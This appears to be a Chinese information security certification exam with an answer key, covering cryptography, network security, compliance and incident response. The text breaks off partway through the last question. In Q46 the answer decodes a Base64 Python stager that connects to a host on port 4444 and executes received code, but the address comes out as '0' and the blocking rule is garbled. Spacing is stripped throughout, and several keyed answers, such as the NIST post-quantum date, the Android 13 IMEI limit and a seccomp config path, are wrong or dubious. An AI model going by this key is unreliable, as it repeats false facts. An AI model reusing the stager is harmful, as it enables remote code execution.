2025年信息安全工程师认证考试试卷及答案

2025年信息安全工程师认证考试试卷及答案一、单项选择题（每题1分，共20分。每题只有一个正确答案，请将正确选项字母填入括号内）1.在GB/T222392019《信息安全技术网络安全等级保护基本要求》中，第三级安全要求首次明确提出的控制域是（）。A.安全物理环境B.安全通信网络C.安全区域边界D.安全计算环境答案：B2.下列关于SM4分组密码算法叙述正确的是（）。A.分组长度128位，密钥长度128位，轮数32轮B.分组长度128位，密钥长度256位，轮数16轮C.分组长度64位，密钥长度128位，轮数32轮D.分组长度256位，密钥长度128位，轮数10轮答案：A3.某Web应用采用JWT作为会话令牌，若服务端仅使用HS256对称密钥签名且密钥硬编码在客户端JavaScript中，则攻击者可直接实施（）。A.重放攻击B.跨站脚本攻击C.密钥泄露导致伪造令牌D.会话固定攻击答案：C4.在Linux系统中，若文件权限为“rwsrxrx”，则该文件的s位表示（）。A.SetUIDB.SetGIDC.Sticky位D.强制锁答案：A5.下列关于BGP安全扩展（BGPsec）的描述，错误的是（）。A.使用RPKI对AS号及前缀进行认证B.对BGPUPDATE消息进行数字签名C.依赖IPsec隧道传输BGP报文D.通过ASPath验证防止路径伪造答案：C6.在Windows事件日志中，成功登录事件通常记录的EventID是（）。A.4624B.4625C.4648D.4672答案：A7.采用Shamir秘密共享方案，将密钥分成5份，要求任意3份可重构，则该方案基于的数学原理是（）。A.中国剩余定理B.拉格朗日插值C.椭圆曲线离散对数D.格基约减答案：B8.在零信任架构中，用于动态评估访问主体信任等级的核心组件是（）。A.SIEMB.PolicyEngineC.TrustAlgorithmD.SDPController答案：C9.下列关于DNSoverHTTPS（DoH）的隐私风险，描述正确的是（）。A.消除本地ISP的DNS劫持B.导致企业内网审计盲区C.降低DNS缓存投毒概率D.依赖TLS1.2以下版本答案：B10.在Android13中，针对应用访问设备标识符的新限制是（）。A.禁止获取IMEIB.禁止获取MAC地址C.禁止获取AdvertisingIDD.禁止获取SSID答案：A11.在PKI体系中，OCSPStapling主要解决的传统OCSP缺陷是（）。A.响应签名伪造B.高可用性缺失C.隐私泄露与性能瓶颈D.证书链过长答案：C12.下列关于量子计算对密码学影响的时间线预测，NIST认为可抵御量子攻击的公钥算法标准化完成时间为（）。A.2025年B.2027年C.2030年D.2035年答案：B13.在ISO/IEC27001:2022附录A中，新增控制域“云服务安全”对应编号为（）。A.A.5.1B.A.5.23C.A.8.12D.A.14.15答案：B14.某企业采用EDR检测到进程hollowings攻击，其最可能触发的行为特征是（）。A.创建远程线程B.内存段权限由RW转为RXC.父进程非explorer.exeD.网络出站连接异常答案：B15.在IPv6中，用于防止地址扫描的临时地址机制是（）。A.SLAACB.DHCPv6C.PrivacyExtensionsD.SecureNeighborDiscovery答案：C16.下列关于同态加密CKKS方案的特性，正确的是（）。A.支持整数精确运算B.支持浮点数近似运算C.基于大整数分解D.无需引导即可无限次乘法答案：B17.在AWSIAM中，用于跨账户授权访问S3存储桶的访问控制机制是（）。A.BucketPolicyB.ACLC.IAMRolewithTrustPolicyD.SecurityGroup答案：C18.在威胁建模STRIDE中，Repudiation威胁对应的安全属性是（）。A.机密性B.完整性C.可用性D.不可否认性答案：D19.下列关于芯片侧信道攻击的描述，错误的是（）。A.功耗分析需物理接触B.电磁分析可非接触C.缓存时序攻击利用共享缓存D.Rowhammer属于侧信道攻击答案：D20.在数据分类分级中，依据《数据安全法》将“一旦泄露可能直接危害人身健康”的数据归为（）。A.核心数据B.重要数据C.一般数据D.个人敏感信息答案：B二、多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）21.以下哪些属于NISTSP80053Rev.5中新增的隐私控制族（）。A.PTB.TRC.APD.DI答案：A、B22.关于TLS1.3与TLS1.2的差异，正确的有（）。A.移除RSA密钥交换B.支持0RTTC.加密整个握手D.保留压缩算法答案：A、B、C23.在容器安全中，以下哪些机制可有效缓解容器逃逸风险（）。A.SeccompB.AppArmorC.CapabilitiesdroppingD.Usernamespace答案：A、B、C、D24.以下哪些算法已进入NIST后量子密码标准化第三轮最终名单（）。A.CRYSTALSKYBERB.ClassicMcElieceC.NTRUPrimeD.SIKE答案：A、B、C25.关于GDPR第35条“数据保护影响评估（DPIA）”，触发条件包括（）。A.系统性监测B.大规模处理敏感数据C.公共街道大规模视频监控D.处理员工工资数据答案：A、B、C26.在Linux内核漏洞缓解机制中，以下哪些针对提权漏洞有效（）。A.SMEPB.SMAPC.KASLRD.CFI答案：A、B、C、D27.以下关于硬件安全模块（HSM）的描述，正确的有（）。A.提供FIPS1402Level4防物理篡改B.支持密钥全生命周期管理C.可通过PKCS11接口调用D.支持对称与非对称算法加速答案：B、C、D28.在零信任参考架构ZTA中，策略决策点（PDP）包含的功能组件有（）。A.PolicyEngineB.PolicyAdministratorC.PolicyEnforcementPointD.TrustAlgorithm答案：A、B29.以下哪些属于常见的内存安全编程语言（）。A.RustB.GoC.SwiftD.Kotlin答案：A、B、C30.关于勒索软件防御，以下哪些措施可有效降低横向移动风险（）。A.网络微分段B.零信任网络访问C.本地管理员口令随机化D.禁用SMBv1答案：A、B、C、D三、填空题（每空2分，共20分）31.在SHA3算法中，海绵结构包含两个阶段：________阶段和________阶段。答案：吸收、挤压32.依据《密码法》，国家对密码实行分类管理，分为________密码、________密码和商用密码。答案：核心、普通33.在AndroidSELinux中，策略文件后缀为________，编译后生成________文件供内核加载。答案：.te、.pp34.当利用ReturnorientedProgramming（ROP）绕过DEP时，攻击者需寻找以________指令结尾的gadget，该指令称为________。答案：ret、ROPgadget35.在IPv6中，用于替代ARP的协议是________，其消息类型包括________请求和________通告。答案：NeighborDiscovery、邻居solicitation、邻居advertisement36.在WindowsCredentialGuard中，LSA凭据隔离依赖的虚拟化技术为________，其基于________模式。答案：VBS、Hypervisor37.在公钥基础设施中，用于发布已吊销证书信息的在线协议是________，其默认端口为________。答案：OCSP、8038.在数据脱敏技术中，保持数据格式不变的脱敏方法称为________，其典型算法为________。答案：格式保留加密、FF139.在Linux内核中，用于限制进程系统调用的沙箱机制为________，其默认配置文件路径为________。答案：Seccomp、/etc/seccomp.json40.依据《个人信息保护法》，处理敏感个人信息需取得个人的________同意，并告知处理的________性。答案：单独、必要四、简答题（共30分）41.（封闭型，6分）简述Kerberos协议中TGT的作用及获取流程，并指出其单点故障点。答案：TGT（TicketGrantingTicket）是客户端向TGS请求服务票据的凭证，证明用户已通过AS认证。获取流程：1.客户端向AS发送明文用户名；2.AS返回用用户密钥加密的TGT及会话密钥；3.客户端解密获得会话密钥并缓存TGT。单点故障点：AS（AuthenticationServer）或KDC宕机导致整个域无法认证。42.（开放型，8分）某金融公司计划将核心账务系统迁移至混合云，需满足等保三级、PCIDSS及数据跨境合规。请从数据生命周期角度提出综合安全控制方案，并指出与纯私有云相比的增量风险。答案：1.数据采集：采用国密TLS1.3+双向证书，敏感字段即时加密（SM4）。2.传输：专线+IPsecVPN，启用MACsec防止中间人；跨境流量走合规通道，启用DLP标记。3.存储：云端使用HSM管理密钥，启用SSEC，备份跨Region加密复制；保留本地密文备份。4.使用：云端启用SGX飞地处理敏感计算，采用同态加密对账，防止云端管理员窥探。5.共享：通过安全多方计算（MPC）与境外子公司联合风控，原始数据不出境。6.销毁：云端调用KMS销毁密钥，本地擦除符合DoD5220.22M。增量风险：a.云服务商内部人员越权访问；b.跨境数据流动被外国长臂管辖；c.共享责任模型导致审计边界模糊；d.云API密钥泄露引发大规模入侵。43.（封闭型，6分）列出Rowhammer攻击的触发条件，并给出两种硬件缓解技术。答案：触发条件：1.DRAM单元电荷泄漏率高于刷新间隔；2.攻击者拥有本地代码执行权限；3.内存控制器允许快速行激活。缓解：1.ECC内存可检测并纠正位翻转；2.目标行刷新（TRR）在硬件层增加额外刷新。44.（开放型，10分）某电商平台在“618”大促期间遭遇大规模Bot抢购，导致库存失真、用户体验下降。请设计一套基于AI的实时反Bot系统，说明数据采集、特征工程、模型训练、在线推理及攻防对抗升级策略。答案：1.数据采集：a.边缘WAF注入JavaScript采集鼠标轨迹、键盘节奏、设备指纹、传感器数据；b.接入层Nginx输出HTTP/2指纹、TLSJA3指纹、IPTTL异常；c.业务网关输出加购/下单时序图。2.特征工程：a.行为序列：滑动窗口统计点击间隔熵值、轨迹曲率；b.网络特征：自治系统变化频率、代理出口IP置信度；c.账号画像：历史订单履约率、优惠券使用异常度。3.模型训练：a.采用XGBoost+LightGBM融合，处理高维稀疏特征；b.使用对抗生成网络（GAN）生成合成Bot样本，解决正负样本不平衡；c.引入FocalLoss降低易分样本权重，提升召回。4.在线推理：a.特征通过Kafka流式传入Flink，延迟<50ms；b.模型以ONNX格式部署在TensorRT，GPUbatch推理；c.风险分数>0.8触发验证码挑战，>0.95直接阻断。5.攻防对抗升级：a.每周自动重训，采用DriftDetection监测特征分布偏移；b.引入强化学习，动态调整阈值，使攻击者收益最小化；c.与威胁情报共享BotnetC2，实时拉黑IP；d.对抗模拟：红队使用SeleniumStealth、HeadlessChrome绕过检测，蓝队持续迭代指纹采集深度。五、应用题（共60分）45.（计算类，15分）某公司计划部署IPsecVPN，采用IKEv2+ESP，两端带宽1Gbps，平均包长500Byte，CPU单核性能为每核2000Mbps（AES256GCM）。若考虑20%突发流量，计算：（1）理论所需最小CPU核心数；（2）若启用AESNI硬件加速，性能提升4倍，求新核心数；（3）若再启用IntelQAT加速，加密性能提升至每卡20Gbps，需多少张QAT卡？解：（1）实际流量=1Gbps×1.2=1.2Gbps每核性能=2000Mbps=2Gbps核心数=1.2/2=0.6→向上取整1核（2）加速后单核=2×4=8Gbps核心数=1.2/8=0.15→1核（3）QAT卡每张20Gbps，需1.2/20=0.06→1张答案：（1）1核；（2）1核；（3）1张46.（分析类，15分）给出一段Base64编码的疑似恶意脚本：`aW1wb3J0IGJhc2U2NAppbXBvcnQgc29ja2V0CnM9c29ja2V0LnNvY2tldCgpCnMuY29ubmVjdCgoJzE5Mi4xNjguMS4xMCcsNDQ0NCkpCmV4ZWMocy5yZWN2KDEwMjQpKQo=`请：（1）解码并恢复原始Python代码；（2）指出该样本的C2地址与端口；（3）给出在Linux网络层阻断该C2的iptables规则；（4）若C2采用域名而非IP，给出基于DNSSinkhole的应对步骤。答案：（1）解码得：`importbase64importsockets=socket.socket()s.connect(('0',4444))exec(s.recv(1024))`（2）C2：0:4444（3）iptablesAOUTPUTd0ptcpdport4444jDROP（4）步骤：a.内网DNS劫持，将恶意域名解析到sinkhole服务器；b.sinkhole记录源IP与查询次数；c.将查询源IP加入EDR隔离列表；d.更新威胁情报，推送防火墙黑名单。47.（综合类，30分）某车企车联网平台采用PKI为车载终端签发X.509证书，现发现大量异常证书在野外出现，经分析私钥未泄露，但发现某RA审核员账号被盗，攻击者以该RA名义签发虚假设备证书。请：（1）给出应急响应步骤（按准备、检测、遏制、根除、恢复、总结六阶段）；（2）设计一套基于区块链的证书透明度（CT）改进方案，防止类似事件；（3）若需实现短周期证书（有效期7天），给出自动化部署架构，包括车载端、云端、工厂产线三部分的流程与密钥管理。答案：（1）应急响应：准备：建立CSIRT，预设RA失陷场景